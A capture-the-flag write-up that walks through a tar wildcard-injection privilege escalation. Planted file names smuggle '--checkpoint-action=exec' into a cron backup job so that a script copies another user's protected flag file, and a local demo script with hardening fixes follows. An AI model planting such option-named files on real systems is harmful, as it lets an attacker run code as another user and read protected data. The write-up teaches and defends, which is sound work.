Our admins take their backup policies very seriously. Every single second they “/bin/tar czf *” our entire home directory. Can you trick the admins into leaking the flag?
First, let's check who we are:
bash-4.3$ whoami
notroot
Is there anything interesting in our home directory?
bash-4.3$ cd /home/notroot/
bash-4.3$ ls
What is running on the system?
bash-4.3$ ps
PID USER TIME COMMAND
1 root 0:25 {supervisord} /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisord.conf
9 flag 0:07 {cron.sh} /bin/sh /home/flag/cron.sh
10 notroot 0:00 /usr/bin/ttyd -g 1000 -u 1000 -x /bin/bash
6046 notroot 0:00 /bin/bash
28646 flag 0:00 /bin/tar czf /home/flag/backup.tar *
28647 flag 0:00 /bin/sh -c gzip
28648 notroot 0:00 ps
That /home/flag looks promising, so let's investigate:
bash-4.3$ cd /home/
bash-4.3$ ls
flag notroot
bash-4.3$ ls flag/
backup.tar cron.sh flag_c6b0057b3d798b0.txt
bash-4.3$ cat flag/flag_c6b0057b3d798b0.txt
cat: can't open 'flag/flag_c6b0057b3d798b0.txt': Permission denied
bash-4.3$ ls -la flag/
total 12
drwxr-sr-x 1 flag flag 24 Nov 17 16:11 .
drwxr-xr-x 1 root root 33 Nov 16 10:55 ..
-rw-r--r-- 1 flag flag 197 Nov 17 16:11 backup.tar
-r-x------ 1 flag flag 134 Jan 25 2020 cron.sh
-r-------- 1 flag flag 41 Jan 25 2020 flag_c6b0057b3d798b0.txt
Let's check what can be done with tar and wildcards. You can search the web for the exploit, or look through the help output for hints:
bash-4.3$ tar --help
...
--checkpoint[=NUMBER] display progress messages every NUMBERth record
(default 10)
--checkpoint-action=ACTION execute ACTION on each checkpoint
...
The backup job runs as the flag user (see the ps output above), and the unquoted * in its tar command is expanded by the shell inside our home directory, so the file names we create there become tar's command-line arguments. That is where we plant the exploit:
bash-4.3$ cd /home/notroot/
bash-4.3$ echo 'cat /home/flag/flag_c6b0057b3d798b0.txt > /tmp/flag.txt' > exploit.sh
bash-4.3$ echo "" > "--checkpoint-action=exec=sh exploit.sh"
bash-4.3$ echo "" > --checkpoint=1
Basically we want tar to treat our file names as command-line options and run whatever we put into exploit.sh. The shell expands the unquoted * into the names of the files in the directory, and GNU tar accepts options anywhere on the command line, so a file named --checkpoint=1 is parsed as the option --checkpoint=1 and a file named "--checkpoint-action=exec=sh exploit.sh" tells tar to run "sh exploit.sh" at every checkpoint.
In our case we know the flag is stored in /home/flag/flag_c6b0057b3d798b0.txt and we want to copy it to a file we can read. Be careful: the destination must be somewhere the flag user can write, which is why we chose /tmp/flag.txt.
Using ~/flag.txt won't work, as flag has no permission to write in /home/notroot. We know the payload runs as flag because the ps output above shows tar being run by that user.
We wait a second for cron to run the backup again, and then we can obtain the flag:
bash-4.3$ cat /tmp/flag.txt
247CTF{xxx}
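To see the primitive on its own, without the cron job and the second user, here is an added example (not part of the original writeup) that reproduces the wildcard injection in a scratch directory as a single user and then shows that ending option parsing with "--" stops it. It assumes GNU tar (the --checkpoint options are a GNU extension); the directory, file and marker names are made up for the demo.

```shell
#!/bin/sh
# Added example, not part of the original writeup: reproduce the wildcard
# injection locally as a single user, and show that ending option parsing
# with '--' stops it. Requires GNU tar (the --checkpoint options are a GNU
# extension). Directory, file and marker names are made up for this demo.

# Create a scratch "home" directory holding the three planted files.
# Sets DEMO_DIR for the other functions.
setup_victim_dir() {
    DEMO_DIR=$(mktemp -d) || return 1
    (
        cd "$DEMO_DIR" || exit 1
        # Payload: runs with the privileges of whoever invokes tar.
        printf 'echo hit > "%s/marker"\n' "$DEMO_DIR" > exploit.sh
        # File names that tar will parse as options once '*' expands.
        : > "--checkpoint-action=exec=sh exploit.sh"
        : > "--checkpoint=1"
    )
}

# Vulnerable form (what the cron job does): unquoted '*' lets the planted
# names become tar options. Returns 0 if the payload ran.
vulnerable_backup() {
    rm -f "$DEMO_DIR/marker"
    ( cd "$DEMO_DIR" && tar cf "$DEMO_DIR.vuln.tar" * ) >/dev/null 2>&1
    [ -f "$DEMO_DIR/marker" ]
}

# Hardened form: '--' ends option parsing, so the same names are archived
# as ordinary files. Returns 0 if the payload did NOT run.
hardened_backup() {
    rm -f "$DEMO_DIR/marker"
    ( cd "$DEMO_DIR" && tar cf "$DEMO_DIR.safe.tar" -- * ) >/dev/null 2>&1
    [ ! -f "$DEMO_DIR/marker" ]
}

cleanup() {
    rm -rf "$DEMO_DIR" "$DEMO_DIR.vuln.tar" "$DEMO_DIR.safe.tar"
}

# Stand-alone run: report whether each form executed the payload.
demo() {
    setup_victim_dir || return 1
    if vulnerable_backup; then echo "tar cf x *    : payload executed"; fi
    if hardened_backup; then echo "tar cf x -- * : payload not executed"; fi
    cleanup
}
demo
```

Running the script prints one line per form. The "--" fix is the smallest change to the cron job; prefixing the glob with "./" (tar cf backup.tar ./*) or feeding tar an explicit file list (find . -maxdepth 1 -print0 | tar --null -T - -cf backup.tar) also prevents file names from being parsed as options. As in the challenge, the payload runs as whichever user invokes tar, so anything it writes must go somewhere that user can write.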